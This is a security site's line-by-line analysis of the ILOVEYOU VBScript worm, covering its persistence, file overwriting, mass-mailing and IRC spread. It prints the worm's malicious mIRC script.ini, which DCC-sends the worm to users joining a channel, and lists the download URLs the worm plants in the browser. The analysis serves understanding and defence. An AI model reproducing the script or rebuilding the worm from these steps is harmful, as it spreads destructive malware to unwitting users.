About | Buy Stuff | News | Products | Rants | Search | Security
Home » News » Roundups » ILOVEYOU

ILOVEYOU: Line for Line

Even though we've had the source to ILOVEYOU for some time, we are not about to publish it, and for obvious reasons. But we will explain how it works, code line for code line. Anyone should be able to follow this, for after all, Visual Basic is a kiddies language.

The worm has the following subroutines: main, regruns, listadriv, infectfiles, folderlist, regcreate, spreadtoemail, and html. Preliminarily the worm opens itself as a file and then calls main.

main()

  1. Set HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout to 0.
  2. Get the locations of the Windows, system, and TEMP directories and store these paths at global scope.
  3. Copy itself to MSKernel32.vbs in the system directory.
  4. Copy itself to Win32DLL.vbs in the Windows directory.
  5. Copy itself to LOVE-LETTER-FOR-YOU.TXT.vbs in the system directory.
  6. Call the following sub-routines/functions in the following order:

    • regruns
    • html
    • spreadtoemail
    • listadriv

regruns()

  1. Create the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32.
  2. Give it the default value of the full path to MSKernel32.vbs.
  3. Create the key HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL.
  4. Give it the default value of the full path to Win32DLL.vbs.
  5. Read HKCU\Software\Microsoft\Internet Explorer\Download Directory. If this path does not exist, set it now to C:\.
  6. Randomize a value for:
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    as one of:
    http://www.skyinet.net/~young1s/.../WIN-BUGSFIX.exe
    http://www.skyinet.net/~angelcat/.../WIN-BUGSFIX.exe
    http://www.skyinet.net/~koichi/.../WIN-BUGSFIX.exe
    http://www.skyinet.net/~chu/.../WIN-BUGSFIX.exe
  7. Search for the file WIN-BUGSFIX.exe in the download directory. If it exists, create the key
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
    And set its value to <download directory>\WIN-BUGSFIX.exe; and reset
    HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    to about:blank.

listadriv()

This routine calls folderlist for all fixed drives found, either local or remote.

infectfiles()

This routine takes a folder argument and then walks through all files found in that folder. It gets the extension of each file and makes a lower case copy of the extension. If the extension is either 'vbe' or 'vbs' it:

  1. Opens the file for writing and copies itself to it.
  2. Closes the file.

If the extension is either 'js', 'jse', 'css', 'wsh', 'sct', or 'hta' it:

  1. Opens the file for writing and copies itself to it.
  2. Closes the file.
  3. Gets the name of the file (without extension).
  4. Creates a new file with 'vbs' added to the name.
  5. Copies itself to this new file.
  6. Deletes the original file.

If the extension is either 'jpg'or 'jpeg' it:

  1. Opens the file for writing and copies itself to it.
  2. Closes the file.
  3. Creates a new file with the 'vbs' extension tagged on and copies the file to it.
  4. Deletes the original file.

If the extension is either 'mp3' or mp2' it:

  1. Creates a new file with the same name and the 'vbs' extension tagged on.
  2. Copies itself to this new file.
  3. Adds the 'Hidden' attribute to the original file.

It now checks if the current file name is 'mirc32.exe', 'mlink32.exe', 'mirc.ini', 'script.ini', or 'mirc.hlp'. If it is, it creates (overwrites) the file 'script.ini' and gives it the following contents:

[script]
;mIRC Script
;  Please dont edit this script... mIRC will corrupt, if mIRC will
    corrupt... WINDOWS will affect and will not run correctly. thanks
;
;Khaled Mardam-Bey
;http://www.mirc.com
;
n0=on 1:JOIN:#:{
n1=  /if ( $nick == $me ) { halt }
n2=  /.dcc send $nick <system directory>\LOVE-LETTER-FOR-YOU.HTM
n3=}

And then closes the file.

folderlist()

This routine takes a folder argument, gets the path to the folder, gets a list of all sub-folders to the folder, and calls infectfiles and then itself recursively for each sub-folder found.

regcreate()

This routine takes two arguments, a Registry key and a Registry value, and sets the value at the key through a native API.

regget()

This function takes a Registry path ending in a value as an argument and returns the value at the path given.

fileexist()

This function takes a file as an argument and simply calls a native API and returns its return value.

folderexist()

This function works the same way as the function above.

spreadtoemail()

This routine runs through the MAPI namespace looking for address lists. It also accesses the Windows Address Book Registry key at:

HKCU\Software\Microsoft\WAB

For each address list entry found it:

  1. Creates a new message destined for the Outbox.
  2. Adds the address found to the message.
  3. Sets the subject line to 'ILOVEYOU'.
  4. Sets the body of the message to:
    '[CRLF]kindly check the attached LOVELETTER coming from me.'
  5. Adds the attachment LOVE-LETTER-FOR-YOU.TXT.vbs already copied to the system directory.
  6. Sends the message.
  7. Makes a note at HKCU\Software\Microsoft\WAB that the message has been sent.

Finally, it stores the address count at the same Registry key.

html()

It is this routine which creates the HTML file which is sent online to IRC chat channels. It is a bit more sophisticated than the email version. It contains the message: 'simple but I think it is good', the message:

This HTML file need ActiveX Control -
To Enable to read this HTML file -
Please press 'YES' button to Enable ActiveX

And it adds an MS infinite loop marquee. The file, if activated, maximizes the window, creates the file MSKernel32.vbs in the system directory on the local machine, copies itself to this file, and then attempts to activate it. If it cannot be activated, it issues the message box:

can't initialize ActiveX

It then sets the key

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32

with the value of the full path of MSKernel32.vbs.

It then creates the file LOVE-LETTER-FOR-YOU.HTM in the system directory on the recipient's machine.

About | Buy | News | Products | Rants | Search | Security
Copyright © Radsoft. All rights reserved.